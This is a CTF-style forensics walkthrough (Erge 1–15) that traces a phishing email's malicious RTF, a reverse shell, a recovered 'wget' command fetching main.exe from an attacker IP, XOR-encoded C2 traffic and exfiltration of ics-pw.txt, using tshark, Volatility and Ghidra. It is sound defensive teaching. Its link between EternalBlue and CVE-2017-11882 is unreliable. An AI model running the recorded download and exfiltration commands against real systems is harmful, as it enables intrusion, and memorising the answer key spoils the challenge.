# <span style="font-family:Papyrus; font-size:4em; color:Purple;">Erge</span>

## **Things to Remember:**

1) Read the getting started before reading this write-up.

2) There is no one right answer on how to get to the solution, there are many, and this walk through is the analysis process of one analyst

## <font color=purple>Erge 1</font>

A malicious zip file was sent via email. Who sent this file?

### Solution Walk Through:

First lets get an idea of what the the email files look like associated with this question. **Artifacts\smtp\alabank**.

In [1]:
Get-ChildItem -Path ..\smtp\alabank | Sort-Object Length -Descending

An example of the smtp file content is shown below:

In [2]:
Get-Content ..\smtp\alabank\1533674617



    Directory: Z:\Artifacts\smtp\alabank


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
------        8/23/2018  10:58 PM        8854244 1535048500                                                            
------        8/23/2018  10:58 PM        8854013 1535062924                                                            
------         1/9/2019   5:51 AM        8799054 1534267029                                                            
------        8/23/2018  10:58 PM         890906 1533671668                                                            
------        8/23/2018  10:58 PM          94543 1534885413                                                            
------        8/23/2018  10:58 PM          65998 1533680398                                                        

Let's start by looking for a file with a bigger size and see what the attachments might be:

The larger files will have the attachments but manually looking at ever mail message will be unproductive. Since they are plain text they can be searched through for keywords. In this case a malicious zip is to be identified. A keyword search through these email messages for the text "zip" can help identifiy possible malicious zip files. The keyword search through these messages is shown below:

In [3]:
Select-String -Path ../smtp/alabank/* -Pattern "\.zip" 

Return-Path: <asarea@orko.net>
Delivered-To: alabank@orko.net
Received: from _ (localhost [127.0.0.1])
	by mail.orko.net (Postfix) with ESMTPSA id 06788181E29
	for <alabank@orko.net>; Tue,  7 Aug 2018 13:43:37 -0700 (PDT)
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII;
 format=flowed
Content-Transfer-Encoding: 7bit
Date: Tue, 07 Aug 2018 13:43:37 -0700
From: asarea@orko.net
To: alabank@orko.net
Subject: Re: Servers
In-Reply-To: <0301c4a2220e81bfc4a935969f1bc188@orko.net>
References: <0d38626a5112c7ef97da7e00c3fe972e@orko.net>
 <0301c4a2220e81bfc4a935969f1bc188@orko.net>
Message-ID: <a0ce639ac03ce56bbf52a3dbc9082f58@orko.net>
X-Sender: asarea@orko.net
User-Agent: Roundcube Webmail

On 2018-08-07 13:37, alabank@orko.net wrote:
> On 2018-08-07 12:16, asarea@orko.net wrote:
>> Amaya,
>> 
>> Check out these servers for our planned upgrade:
>> https://www.amazon.com/Intel-R1304WT2GSR-Server-System/dp/B018IZ9XRO/ref=sr_1_14?ie=UTF8&qid=1533669188&sr=8-14&keywords=server
>> 
>> R

The `-Path` parameter specifies the path to execute the search and the `-Pattern` specifies which pattern you want to search for. In this case the keyword search is for zip and escaping the period which is normally a single wildcard. This search only shows one file with a zip attachment. To view that email execute the following command, reducing the amount of lines returned with `-TotalCount 50` helps with readability:

In [4]:
Get-Content ../smtp/alabank/1534267029  -TotalCount 50


Z:\Artifacts\smtp\alabank\1534267029:36: name=onion.zip
Z:\Artifacts\smtp\alabank\1534267029:38: filename=onion.zip;




The `-TotalCount` option was used to limit the output to screen to 50 lines. Since this is the only email with a zip attachment, it can be assumed it is malicious, and the sender is the answer to this question. Further analysis of the zip will identiy my it is malicious.

#### Answer: noreply@onionlistserver.com

## <font color=purple>Erge 2</font>

What is the name of the zip file with suspected malware that was attached to the email?

### Solution

In the same email identified above (1534267029), in the content section the attached filename is the answer to question.

In [5]:
Get-Content ../smtp/alabank/1534267029  -TotalCount 50

Return-Path: <noreply@onionlistserve.com>
Delivered-To: alabank@orko.net
Received: from mail.0rk0.net (unknown [37.131.192.151])
	by mail.orko.net (Postfix) with ESMTPS id 32373181FC3
	for <alabank@orko.net>; Tue, 14 Aug 2018 10:17:05 -0700 (PDT)
Received: from _ (localhost [127.0.0.1])
	by mail.0rk0.net (Postfix) with ESMTPSA id 24E7D181C93
	for <alabank@orko.net>; Tue, 14 Aug 2018 13:16:54 -0400 (EDT)
MIME-Version: 1.0
Content-Type: multipart/mixed;
 boundary="=_eba8b245477d418dee76c9098cad7ff1"
Date: Tue, 14 Aug 2018 13:16:54 -0400
From: noreply@onionlistserve.com
To: alabank@orko.net
Subject: Update to election hacking
Message-ID: <d1e47de5dd0693558becf62994f5805f@onionlistserve.com>
X-Sender: noreply@onionlistserve.com
User-Agent: Roundcube Webmail

--=_eba8b245477d418dee76c9098cad7ff1
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset=US-ASCII;
 format=flowed

Hello AMAYA ALABANKADA,

We have made some updates to our story about Russians hacking the 
presidential e

#### Answer: onion.zip

## <font color=purple>Erge 3</font>

What is the actual filename of the document containing suspected malware in the zip file?

### Solution

The first set to solve this solution is to carve the file out of the email file from the past two questions `../smtp/alabank/1534267029`. This can be down by base64 decoding the attachment manually from the email or with the following `carve.py` python script which with the following commands below: 

In [2]:
python ../carve.py ../smtp/alabank/1534267029

[+] Email part ID 0: None
==> Content Type: multipart/mixed

[+] Email part ID 1: None
==> Content Length in bytes: 214
==> Content Type: text/plain

[+] Email part ID 2: onion.zip
==> Content Length in bytes: 6419954
==> Content Type: application/zip



The zip file in question is had the ID 2 which was passed in the command below to extract it:

In [4]:
python ../carve.py ../smtp/alabank/1534267029 2

[+] Email part ID 0: None
==> Content Type: multipart/mixed

[+] Email part ID 1: None
==> Content Length in bytes: 214
==> Content Type: text/plain

[+] Email part ID 2: onion.zip
==> Content Length in bytes: 6419954
==> Content Type: application/zip

Dumping email part ID 2 with filename onion.zip...
Successfully dumped file onion.zip


Once the zip is extracted from the email we can look inside of it with 7zip to see what was inside it with the following command:

In [6]:
C:\Users\kltietj\Desktop\Get-ZimmermanTools\7z\7za.exe l onion.zip


7-Zip (a) 18.06 (x86) : Copyright (c) 1999-2018 Igor Pavlov : 2018-12-30

Scanning the drive for archives:
1 file, 6419954 bytes (6270 KiB)

Listing archive: onion.zip

--
Path = onion.zip
Type = zip
Physical Size = 6419954

   Date      Time    Attr         Size   Compressed  Name
------------------- ----- ------------ ------------  ------------------------
2018-08-13 14:56:26 .....     14322839      6419786  onion.rtf
------------------- ----- ------------ ------------  ------------------------
2018-08-13 14:56:26           14322839      6419786  1 files


#### Answer: onion.rtf

## <font color=purple>Erge 4</font>

What CVE does the malicious document exploit? Enter in the form of CVE-xxxx-xxxxx

### Solution

Right click on the file and click on **Scan with Windows Defender**.

![Erge](pics/Erge8.png)

**Windows Defender** says there is 2 threats.

![Erge](pics/Erge9.png)

Click on **See threat details**.

![Erge](pics/Erge10.png)

#### Answer: CVE-2017-11882

## <font color=purple>Erge 5</font>

What is the name of the embedded executable in the document? 

Extract the malicious RTF from the zip file with the following command:

In [8]:
C:\Users\kltietj\Desktop\Get-ZimmermanTools\7z\7za.exe e onion.zip


7-Zip (a) 18.06 (x86) : Copyright (c) 1999-2018 Igor Pavlov : 2018-12-30

Scanning the drive for archives:
1 file, 6419954 bytes (6270 KiB)

Extracting archive: onion.zip
--
Path = onion.zip
Type = zip
Physical Size = 6419954

Everything is Ok

Size:       14322839
Compressed: 6419954


Examining the RTF file with oletools with the RTF option with the follwing command:

In [2]:
rtfobj onion.rtf

rtfobj 0.54 on Python 2.7.16 - http://decalage.info/python/oletools
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/oletools/issues

File: 'onion.rtf' - size: 14322839 bytes
---+----------+---------------------------------------------------------------
id |index     |OLE Object                                                     
---+----------+---------------------------------------------------------------
0  |00009A4Fh |format_id: 2 (Embedded)                                        
   |          |class name: 'Package'                                          
   |          |data size: 7140777                                             
   |          |OLE Package object:                                            
   |          |Filename: u'e.exe'                                             
   |          |Source path: u'C:\\fakepath\\e.exe'                            
   |          |Temp path = u'C:\\fakepath\\e.exe'      

The analysis of the `onion.rtf` file shows there is an embdeded executable file named `e.exe` within it. 

#### Answer: e.exe

## <font color=purple>Erge 6</font>

What well known exploit did the document run to escalate it's access?

### Solution

Look up the CVE from #4 to find the well known exploit.


#### Answer: eternalblue

## <font color=purple>Erge 7</font>

What IP address did PC-1 communicate to and set up a reverse shell with? Hint: We think the attack occured around 12:10 PM ABQ, NM time on 8/14/2018.



### Solution
The folder **Artifacts\pcap** has all the captured packets that need examination. Select a pcap close to the time given which is the file **2018-08-14_11-40-44.pcap**. `tshark` Wireshark's commandline equivalent will be used to perform the analysis in this challenge. To start create an alias for tshark for easier execution from command line:

In [3]:
new-alias tshark 'C:\Program Files\Wireshark\tshark.exe'

The next step is to review the traffic to for PC-1. Filter for the date and time (accounting for the time difference) and the IP address for PC-1 (given in the Network map in the Getting started) as shown below, limiting the intial amount of data returned to the first 50 lines.

In [4]:
tshark -r ..\pcaps\2018-08-14_11-40-44.pcap -Y "frame.time >= \""2018-08-14 10:05:00\"" && ip.addr == 192.168.1.10" -T fields -e frame.time -e ip.src -e ip.dst | select -First 50

Aug 14, 2018 11:40:44.910103000 Pacific Daylight Time	208.77.78.206	192.168.1.10
Aug 14, 2018 11:40:44.911494000 Pacific Daylight Time	192.168.1.10	208.77.78.206
Aug 14, 2018 11:40:44.914043000 Pacific Daylight Time	208.77.78.206	192.168.1.10
Aug 14, 2018 11:40:44.915417000 Pacific Daylight Time	192.168.1.10	208.77.78.206
Aug 14, 2018 11:40:44.915942000 Pacific Daylight Time	208.77.78.206	192.168.1.10
Aug 14, 2018 11:40:44.916331000 Pacific Daylight Time	208.77.78.206	192.168.1.10
Aug 14, 2018 11:40:44.917416000 Pacific Daylight Time	192.168.1.10	208.77.78.206
Aug 14, 2018 11:40:44.919269000 Pacific Daylight Time	208.77.78.206	192.168.1.10
Aug 14, 2018 11:40:44.920399000 Pacific Daylight Time	192.168.1.10	208.77.78.206
Aug 14, 2018 11:40:44.920559000 Pacific Daylight Time	208.77.78.206	192.168.1.10
Aug 14, 2018 11:40:44.921403000 Pacific Daylight Time	192.168.1.10	208.77.78.206
Aug 14, 2018 11:40:44.922092000 Pacific Daylight Time	208.77.78.206	192.168.1.10
Aug 14, 2018 11:40:44.922983

The first packet has the IP address of **5.101.80.151** and we can infer form the time frame listed that this IP address was used to set up the reverse shell. 
#### Answer: 5.101.80.151

## <font color= purple>Erge 8</font>

What command was run on the reverse shell to download an executable?

### Solution:

Continue with the analysis of the previously identified pcap in **Erge_7**. Filter the packets with same filter as Erge_7, but add the IP address found in Erge_7. **frame.time >= "Aug 14, 2018 13:05:00.00" && ip.addr==192.168.1.10 && ip.addr== 5.101.80.151**. 

In [45]:
tshark -r ..\pcaps\2018-08-14_11-40-44.pcap -Y "frame.time >= \""2018-08-14 10:05:00\"" && ip.addr == 192.168.1.10 && ip.addr == 5.101.80.151" -T fields -e frame.time -e ip.src -e ip.dst -e http.unknown_header | select -First 50

rame.time >= \""2018-08-14 11:05:00\"" && ip.addr == 192.168.1.10 && ip.addr == 5.101.80.151" -T fields -e frame.time -e ip.src -e ip.dst -e http.unknown_header | select -First 50
Aug 14, 2018 11:50:30.334603000 Pacific Daylight Time	192.168.1.10	5.101.80.151	
Aug 14, 2018 11:50:33.337335000 Pacific Daylight Time	192.168.1.10	5.101.80.151	
Aug 14, 2018 11:50:39.343533000 Pacific Daylight Time	192.168.1.10	5.101.80.151	
Aug 14, 2018 11:50:42.335831000 Pacific Daylight Time	50.0.0.1,192.168.1.10	192.168.1.10,5.101.80.151	
Aug 14, 2018 11:50:59.857125000 Pacific Daylight Time	192.168.1.10	5.101.80.151	
Aug 14, 2018 11:51:02.853411000 Pacific Daylight Time	192.168.1.10	5.101.80.151	
Aug 14, 2018 11:51:02.856505000 Pacific Daylight Time	50.0.0.1,192.168.1.10	192.168.1.10,5.101.80.151	
Aug 14, 2018 11:51:02.856518000 Pacific Daylight Time	50.0.0.1,192.168.1.10	192.168.1.10,5.101.80.151	
Aug 14, 2018 11:51:08.859825000 Pacific Daylight Time	192.168.1.10	5.101.80.151	
Aug 14, 2018 11:51:11.857

This shows the commands that were ran.

#### Answer: wget http://52.95.251.151/main.exe

## <font color=purple>Erge 9</font>

What is the IP address of the c2 server?



Examination of the behavior of the binary downloaded is required to determine the IP address of teh C2 server. Analysis of memory will help us determine what the C2 address is by seeing if the downloaded binary has any open connections. The memmory image for PC-1 is located in the folder **Artifacts\memory\PC-1\20180821124001\memory**. The first step in performing memory analysis is to determine the correct profile to use with the memory image. To determine the correct profile to use for analysis execute the following commands:

In [10]:
new-alias vol.py 'C:\volatility-master\vol.py'

In [3]:
vol.py -f ..\memory\PC-1\20180821124001\memory\data.lime imageinfo

Volatility Foundation Volatility Framework 2.6.1
INFO    : volatility.debug    : Determining profile based on KDBG search...
          Suggested Profile(s) : Win7SP1x64, Win7SP0x64, Win2008R2SP0x64, Win2008R2SP1x64_24000, Win2008R2SP1x64_23418, Win2008R2SP1x64, Win7SP1x64_24000, Win7SP1x64_23418
                     AS Layer1 : WindowsAMD64PagedMemory (Kernel AS)
                     AS Layer2 : LimeAddressSpace (Unnamed AS)
                     AS Layer3 : FileAddressSpace (Z:\Artifacts\memory\PC-1\20180821124001\memory\data.lime)
                      PAE type : No PAE
                           DTB : 0x187000L
                          KDBG : 0xf8000283f0a0L
          Number of Processors : 2
     Image Type (Service Pack) : 1
                KPCR for CPU 0 : 0xfffff80002840d00L
                KPCR for CPU 1 : 0xfffff880009ef000L
             KUSER_SHARED_DATA : 0xfffff78000000000L
           Image date and time : 2018-08-21 19:40:01 UTC+0000
     Image local date and time : 2018-0

The first suggested profile is the first to use to make sure the right data structures are parsed with other volatility plug-ins. To determine if the malicious binary is running we can execute the following command:

In [5]:
vol.py -f ..\memory\PC-1\20180821124001\memory\data.lime --profile=Win7SP1x64 pslist

Volatility Foundation Volatility Framework 2.6.1
Offset(V)          Name                    PID   PPID   Thds     Hnds   Sess  Wow64 Start                          Exit                          
------------------ -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------
0xfffffa80018459e0 System                    4      0     85      448 ------      0 2018-08-21 16:03:49 UTC+0000                                 
0xfffffa80026a2b30 smss.exe                260      4      2       30 ------      0 2018-08-21 16:03:50 UTC+0000                                 
0xfffffa80027e7b30 csrss.exe               344    336      9      329      0      0 2018-08-21 16:03:54 UTC+0000                                 
0xfffffa80018aa380 wininit.exe             392    336      3       78      0      0 2018-08-21 16:03:55 UTC+0000                                 
0xfffffa80027cd6e0 csrss.exe               408    384      8      196      

`main.exe` is currently running in the memory image. To see what network connections the process may have associated with it execute the following command:

In [7]:
vol.py -f ..\memory\PC-1\20180821124001\memory\data.lime --profile=Win7SP1x64 netscan

Volatility Foundation Volatility Framework 2.6.1
Offset(P)          Proto    Local Address                  Foreign Address      State            Pid      Owner          Created
0x7e400ec0         UDPv4    127.0.0.1:55696                *:*                                   348      svchost.exe    2018-08-21 16:03:58 UTC+0000
0x7e4095d0         UDPv4    127.0.0.1:61833                *:*                                   1188     svchost.exe    2018-08-21 16:06:00 UTC+0000
0x7e4332f0         UDPv4    0.0.0.0:57875                  *:*                                   1188     svchost.exe    2018-08-21 16:03:58 UTC+0000
0x7e4332f0         UDPv6    :::57875                       *:*                                   1188     svchost.exe    2018-08-21 16:03:58 UTC+0000
0x7e4349a0         UDPv4    0.0.0.0:57874                  *:*                                   1188     svchost.exe    2018-08-21 16:03:58 UTC+0000
0x7e436730         UDPv4    0.0.0.0:123                    *:*          

Looking at the associated pid with `main.exe` we see that it has an `ESTABLISHED` connection with the IP `52.95.251.150`

#### Answer: 52.95.251.150

## <font color=purple>Erge 10</font>

What was the name of the file that was exfiltrated by the malware?




### Solution:

Knowing the process `main.exe` has an open connectionto the IP address `52.95.251.150` lets review the captured network traffic for possible exfiltration to that IP. First lets look at any `POST` traffic from the compromsied host to the known malicious IP address `52.95.251.150` with the following command, with the earliest known PCAP with malicious activity:


In [8]:
tshark -r ..\pcaps\2018-08-14_11-40-44.pcap -Y "ip.addr == 52.95.251.150" -T fields -e frame.time -e ip.src -e ip.dst -e http.unknown_header | select -First 50

There does not seem to be any traffic in this PCAP to this IP address, so lets apply the same filter to the next time frame:

In [7]:
tshark -r ..\pcaps\2018-08-14_12-42-28.pcap -Y "ip.addr == 52.95.251.150" -T fields -e frame.time -e ip.src -e ip.dst -e http.request.method -e http.request.uri

Still no traffic to this IP, continue to examine next time frame.

In [9]:
tshark -r ..\pcaps\2018-08-14_13-06-08.pcap -Y "ip.addr == 52.95.251.150" -T fields -e frame.time -e ip.src -e ip.dst -e http.request.method -e http.request.uri

Aug 14, 2018 13:11:45.965824000 Pacific Daylight Time	192.168.1.10	52.95.251.150		
Aug 14, 2018 13:11:45.967090000 Pacific Daylight Time	52.95.251.150	192.168.1.10		
Aug 14, 2018 13:11:45.967514000 Pacific Daylight Time	192.168.1.10	52.95.251.150		
Aug 14, 2018 13:11:45.994880000 Pacific Daylight Time	192.168.1.10	52.95.251.150	GET	/%78%6f%72/%6b%65%79
Aug 14, 2018 13:11:45.995644000 Pacific Daylight Time	52.95.251.150	192.168.1.10		
Aug 14, 2018 13:11:45.996891000 Pacific Daylight Time	52.95.251.150	192.168.1.10		
Aug 14, 2018 13:11:45.998366000 Pacific Daylight Time	192.168.1.10	52.95.251.150	GET	/4E63C887BCF2
Aug 14, 2018 13:11:46.000283000 Pacific Daylight Time	52.95.251.150	192.168.1.10		
Aug 14, 2018 13:11:46.001149000 Pacific Daylight Time	192.168.1.10	52.95.251.150		
Aug 14, 2018 13:11:46.001324000 Pacific Daylight Time	192.168.1.10	52.95.251.150	POST	/4E63C887BCF2
Aug 14, 2018 13:11:46.001841000 Pacific Daylight Time	52.95.251.150	192.168.1.10		
Aug 14, 2018 13:11:46.122346000

There is alot of traffic to this IP address and to look for exlfiltration lets focus on the `POST` activity and filter only for that:

In [10]:
tshark -r ..\pcaps\2018-08-14_13-06-08.pcap -Y "ip.addr == 52.95.251.150 && http.request.method == POST" -T fields -e frame.time -e ip.src -e ip.dst -e http.request.method -e http.request.uri

s\2018-08-14_13-06-08.pcap -Y "ip.addr == 52.95.251.150" -T fields -e frame.time -e ip.src -e ip.dst -e http.request.method -e http.request.uri
Aug 14, 2018 13:11:45.965824000 Pacific Daylight Time	192.168.1.10	52.95.251.150		
Aug 14, 2018 13:11:45.967090000 Pacific Daylight Time	52.95.251.150	192.168.1.10		
Aug 14, 2018 13:11:45.967514000 Pacific Daylight Time	192.168.1.10	52.95.251.150		
Aug 14, 2018 13:11:45.994880000 Pacific Daylight Time	192.168.1.10	52.95.251.150	GET	/%78%6f%72/%6b%65%79
Aug 14, 2018 13:11:45.995644000 Pacific Daylight Time	52.95.251.150	192.168.1.10		
Aug 14, 2018 13:11:45.996891000 Pacific Daylight Time	52.95.251.150	192.168.1.10		
Aug 14, 2018 13:11:45.998366000 Pacific Daylight Time	192.168.1.10	52.95.251.150	GET	/4E63C887BCF2
Aug 14, 2018 13:11:46.000283000 Pacific Daylight Time	52.95.251.150	192.168.1.10		
Aug 14, 2018 13:11:46.001149000 Pacific Daylight Time	192.168.1.10	52.95.251.150		
Aug 14, 2018 13:11:46.001324000 Pacific Daylight Time	192.168.1.10	52.

In [11]:
tshark -r ..\pcaps\2018-08-14_14-12-59.pcap -Y "ip.addr == 52.95.251.150 && http.request.method == POST" -T fields -e frame.time -e ip.src -e ip.dst -e http.request.method -e http.request.uri

method == POST" -T fields -e frame.time -e ip.src -e ip.dst -e http.request.method -e http.request.uri
Aug 14, 2018 13:11:46.001324000 Pacific Daylight Time	192.168.1.10	52.95.251.150	POST	/4E63C887BCF2
Aug 14, 2018 13:11:51.127123000 Pacific Daylight Time	192.168.1.10	52.95.251.150	POST	/4E63C887BCF2
Aug 14, 2018 13:11:56.205747000 Pacific Daylight Time	192.168.1.10	52.95.251.150	POST	/4E63C887BCF2
Aug 14, 2018 13:12:01.321891000 Pacific Daylight Time	192.168.1.10	52.95.251.150	POST	/4E63C887BCF2
Aug 14, 2018 13:12:06.442351000 Pacific Daylight Time	192.168.1.10	52.95.251.150	POST	/4E63C887BCF2
Aug 14, 2018 13:12:12.036908000 Pacific Daylight Time	192.168.1.10	52.95.251.150	POST	/4E63C887BCF2
Aug 14, 2018 13:12:17.121430000 Pacific Daylight Time	192.168.1.10	52.95.251.150	POST	/4E63C887BCF2
Aug 14, 2018 13:12:22.205181000 Pacific Daylight Time	192.168.1.10	52.95.251.150	POST	/4E63C887BCF2
Aug 14, 2018 13:12:27.297442000 Pacific Daylight Time	192.168.1.10	52.95.251.150	POST	/4E63C887BC

The behavior in this traffic can be assumed to be command and control traffic and not any distinct files going out when you look at the packet content.

Continue to examine the POST traffic to this IP until we see a different pattern in POST's

In [3]:
tshark -r ..\pcaps\2018-08-14_14-12-59.pcap -Y 'ip.addr == 52.95.251.150 && http.request.method == POST && http.request.uri != ""/4E63C887BCF2""' -T fields -e frame.time -e ip.src -e ip.dst -e http.request.method -e http.request.uri

Aug 14, 2018 14:14:42.753729000 Pacific Daylight Time	192.168.1.10	52.95.251.150	POST	/%65%6e%75%6d/4E63C887BCF2/c:%5C*
Aug 14, 2018 14:23:04.550621000 Pacific Daylight Time	192.168.1.10	52.95.251.150	POST	/%65%6e%75%6d/4E63C887BCF2/c:%5CUsers*

** (tshark.exe:11152): WARNING **: Dissector bug, protocol HTTP, in packet 57023: C:\buildbot\builders\wireshark-3.0-64\windows-2019-x64\build\epan\packet.c:761: failed assertion "saved_layers_len < 500"

** (tshark.exe:11152): WARNING **: Dissector bug, protocol HTTP, in packet 57023: C:\buildbot\builders\wireshark-3.0-64\windows-2019-x64\build\epan\packet.c:761: failed assertion "saved_layers_len < 500"

** (tshark.exe:11152): WARNING **: Dissector bug, protocol HTTP, in packet 59541: C:\buildbot\builders\wireshark-3.0-64\windows-2019-x64\build\epan\packet.c:761: failed assertion "saved_layers_len < 500"

** (tshark.exe:11152): WARNING **: Dissector bug, protocol HTTP, in packet 59541: C:\buildbot\builders\wireshark-3.0-64\windows-2019-x64\bu

Nothing obvious in this traffic execpt for maybe the backdoor providing directorty listings or changing directories. When you decode the other strings in the URI it decodes to `enum`. Continue to examine further time frames in the PCAP.

In [4]:
tshark -r ..\pcaps\2018-08-14_14-39-00.pcap -Y 'ip.addr == 52.95.251.150 && http.request.method == POST && http.request.uri != ""/4E63C887BCF2""' -T fields -e frame.time -e ip.src -e ip.dst -e http.request.method -e http.request.uri

Aug 14, 2018 15:01:17.057421000 Pacific Daylight Time	192.168.1.10	52.95.251.150	POST	/%65%6e%75%6d/4E63C887BCF2/c:%5Cusers%5Casarea%5C*
Aug 14, 2018 15:03:27.042803000 Pacific Daylight Time	192.168.1.10	52.95.251.150	POST	/%65%6e%75%6d/4E63C887BCF2/c:%5Cusers%5Casarea%5Cdesktop%5C*
Aug 14, 2018 15:05:11.800992000 Pacific Daylight Time	192.168.1.10	52.95.251.150	POST	/%65%78%66%69%6c/4E63C887BCF2/c:%5Cusers%5Casarea%5Cdesktop%5Cics-pw.txt


This packet capture shows a POST of a text file named `ics-pw.txt` and the URI decodes to `exfil`. 
#### Answer: ics-pw.txt

## <font color=purple>Erge 11</font>

Recover the malware from memory. What is md5sum of main.exe?

### Solution:

To extract the malware from memory you will need to dump the file with volatility. Refer to the previous process listing in Erge 9 and determine what PID `main.exe` had, which is 1028. To extract the backdoor first make a directory to extract the file to:


In [6]:
mkdir dump

mkdir : An item with the specified name Z:\Artifacts\tf8-write\dump already exists.
At line:1 char:1
+ mkdir dump
+ ~~~~~~~~~~
    + CategoryInfo          : ResourceExists: (Z:\Artifacts\tf8-write\dump:String) [New-Item], IOException
    + FullyQualifiedErrorId : DirectoryExist,Microsoft.PowerShell.Commands.NewItemCommand
 


Then dump the PE using the `procdump` plug-in and specifing the PID with the command below:

In [11]:
vol.py -f ..\memory\PC-1\20180821124001\memory\data.lime --profile=Win7SP1x64 procdump -D dump/ -p 1028

Volatility Foundation Volatility Framework 2.6.1
Process(V)         ImageBase          Name                 Result
------------------ ------------------ -------------------- ------
0xfffffa8002cb2b30 0x0000000000f90000 main.exe             OK: executable.1028.exe


Check to the contents of the directory:

In [12]:
dir dump



    Directory: Z:\Artifacts\tf8-write\dump


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
------        9/30/2019   9:28 AM         166400 executable.1028.exe                                                   




Get the MD5 hash of the exectuable with the following command:

In [13]:
get-filehash dump/executable.1028.exe -Algorithm MD5


Algorithm       Hash                                                                   Path                            
---------       ----                                                                   ----                            
MD5             AD8CFE14FD6555B1E7385E49BA1A28BB                                       Z:\Artifacts\tf8-write\dump\e...




#### Answer: ad8cfe14fd6555b1e7385e49ba1a28bb

## <font color=purple>Erge 12</font>

What is the compile time of the malware according to IDA? Answer in the number of seconds since epoch in decimal?

### Solution:

It's not necessary to use IDA and there is a much easier way using Exiftool. 

In [14]:
exiftool .\dump\executable.1028.exe

ExifTool Version Number         : 11.65
File Name                       : executable.1028.exe
Directory                       : ./dump
File Size                       : 162 kB
File Modification Date/Time     : 2019:09:30 09:28:46-07:00
File Access Date/Time           : 2019:09:30 09:29:03-07:00
File Creation Date/Time         : 2019:09:30 09:28:46-07:00
File Permissions                : rw-rw-rw-
File Type                       : Win32 EXE
File Type Extension             : exe
MIME Type                       : application/octet-stream
Machine Type                    : Intel 386 or later, and compatibles
Time Stamp                      : 2018:08:07 10:23:24-07:00
Image File Characteristics      : Executable, 32-bit
PE Type                         : PE32
Linker Version                  : 14.14
Code Size                       : 125952
Initialized Data Size           : 42496
Uninitialized Data Size         : 0
Entry Point                     : 0x8423
OS Version                      : 6.0
I

Use the following command below to convert the PE file timestamp to seconds, accounting for timezone change:

In [15]:
 get-date (Get-Date "2018/08/07 17:23:24")  -UFormat %s

1533662604


#### Answer: 1533662604

## <font color=purple>Erge 13</font>

What cipher is the malware using to communicate? 

### Solution:

Start by analyzing the stirngs in the malware with the following command:


In [10]:
strings -a ./dump/executable.1028.exe


Strings v2.53 - Search for ANSI and Unicode strings in binary images.
Copyright (C) 1999-2016 Mark Russinovich
Sysinternals - www.sysinternals.com

!This program cannot be run in DOS mode.
H-q>
mc(
mc(
mc(
mc(
m|L
l$L
m1+
m1+
mRich
.text
`.rdata
@.data
.reloc
u!h
Ph@
QhT
Pht
}&3
s*j
:"t
jPht
t"j
M<Q
t;j
PhH
Phh
Qh8
RhX
PQQSVW
Y_[
jDj
u,h
jPh
Rh<
PhD
Ph|
Ph?
Ph?
QhL
Php
tlh
tTh
u#j
u#j
t!j
PhT
hHg
j Y+
t d
u"hP
tF2
j Y+
9>t
9>t
h`f
$S3
ntel
5ineI
5Genu
t#=`
|2j
tG3
9PE
f9A
8csm
SVW
Y__[
_[
_[
t#2
oF f
on0
oF f
on0
oF f
on0
INO
oV 
o0
of@
onP
ov`
o~p
 r#
oV f
o0f
W f
_0f
of@f
onPf
ov`f
o~pf
g@f
oPf
w`f
 Ju
FGIu
FGIu
oF f
on0
oF f
on0
oF f
on0
INO
oV 
o0
of@
onP
ov`
o~p
 r#
oV f
o0f
W f
_0f
of@f
onPf
ov`f
o~pf
g@f
oPf
w`f
 Ju
FGIu
FGIu
G f
G0f
G@f
GPf
G`f
s>f
VWj
_[
QSV
x6k
I9x
QQSVWd
_[
 ]
H$]
Ph#
SVW
PPP
_[
7SV
Y[
8_]
fu_
_[
8csm
t/h
uYj
BVj(j
YW
t)h
]Y[
j8hHh
v:k
;D;
;D;
PRj
?csm
u SW
u(@
_[]
8csm
SVW
>csm
>csm
>csm
u W
u PW
u'_[
QQW
tEj
?MOC
?RCC
u S
u S
|c;F
@u(j
u Qj
[_
VRQ
u4j
YYP

Reviewing the strings shows there was possibly some cipher functions related to XOR. To confirm this open up the executable in Ghidra, start a project and analyze the binary. Review the defined strings by filtering for `xor` with results shown below:

![Erge](pics/xorstrings.png)

Click on the first `XorKey` and it will take you to the location of the string in the binary and the location of what function it is in shown below:

![Erge](pics/xorkeyfunction.png)

Double click on the function to see it's process flow and decomplie it. The decompiled code is shown below showing the malware gets a registry key value named `XorKey`. The figure below shows a snippet of this functions decomplilation:

![Erge](pics/xordecomplied.png)

#### Answer: xor

## <font color=purple>Erge 14</font>

What is the key used by the cipher?

### Solution:

In the previous solution the malware sets a registry value called XorKey and that value is presumablly the key used by the cipher. To examine the registry we will need to dump the registry files from memory with the following command:

In [16]:
vol.py -f ..\memory\PC-1\20180821124001\memory\data.lime --profile=Win7SP1x64 dumpregistry -D ./dump

Volatility Foundation Volatility Framework 2.6.1
**************************************************
Writing out registry: registry.0xfffff8a000855010.SOFTWARE.reg

**************************************************
**************************************************
Writing out registry: registry.0xfffff8a00005e010.HARDWARE.reg

**************************************************
**************************************************
Writing out registry: registry.0xfffff8a0015ff010.ntuserdat.reg

**************************************************
**************************************************
Writing out registry: registry.0xfffff8a000a9f010.SECURITY.reg

**************************************************
**************************************************
Writing out registry: registry.0xfffff8a008b28010.DEFAULT.reg

**************************************************
**************************************************
Writing out registry: registry.0xfffff8a000c26010.NTUSERDAT.reg

*****

Examining the function with the `XorKey` registry key value shows the malware creates a key as shown in the figure below:

![Erge](pics/createkey.png)

Since the malware creates the key in the SOFTWARE registry hive, examine that hive further with Registry Explorer. With the dumpted hive loaded do a keyword search for`crash` like the figure below:

![Erge](pics/notkeysearchhits.png)

This search turned up no results for the keyword `crash`. The registry in memory may not have all the data written to it or all be loaded into memory so reviewing the data on the hosts disk might have different results. Load up the forensic image of `PC-1` in Autopsy and extract the SOFTWARE registry hive from disk as shown in the figure below:

![Erge](pics/softwareextraction.png)

Once the file is extracted load the hive in Registry Explorer and do a keyword search for `crash` and you should get resutls similar to those in the figure below:

![Erge](pics/searchresults.png)

Navigate to the key path identified in the search results. The figure below is the `XorKey` registry key value and the data within it which is the cipher key is `CRASH`

![Erge](pics/cipherkey.png)

#### Answer: CRASH

## <font color=purple>Erge 15</font>

What registry key does the malware replace to enable persistence?

### Solution:
